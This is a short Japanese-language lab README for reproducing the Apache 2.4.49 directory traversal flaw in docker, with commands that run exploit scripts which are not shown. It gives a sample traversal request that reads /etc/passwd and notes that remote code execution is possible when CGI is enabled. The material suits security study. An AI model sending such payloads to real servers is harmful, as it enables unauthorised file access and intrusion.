docker-compose up --build vuln-server-no-cgid
python no-cgid/exploit.py
docker-compose up --build vuln-server-cgid-sh
python cgid-sh/exploit.py
Apache HTTP Server 2.4.49のディレクトリトラバーサルの脆弱性。Require all deniedが設定されていない場合に発生する。
%2eでエンコードされたURLを受け取った時に、上位ディレクトリへのアクセスを許してしまう。 例: GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
CGIが有効な場合はRCE可。
この脆弱性への対応が不十分だったことによるApache HTTP Server 2.4.50の脆弱性CVE-2021-42013が存在する。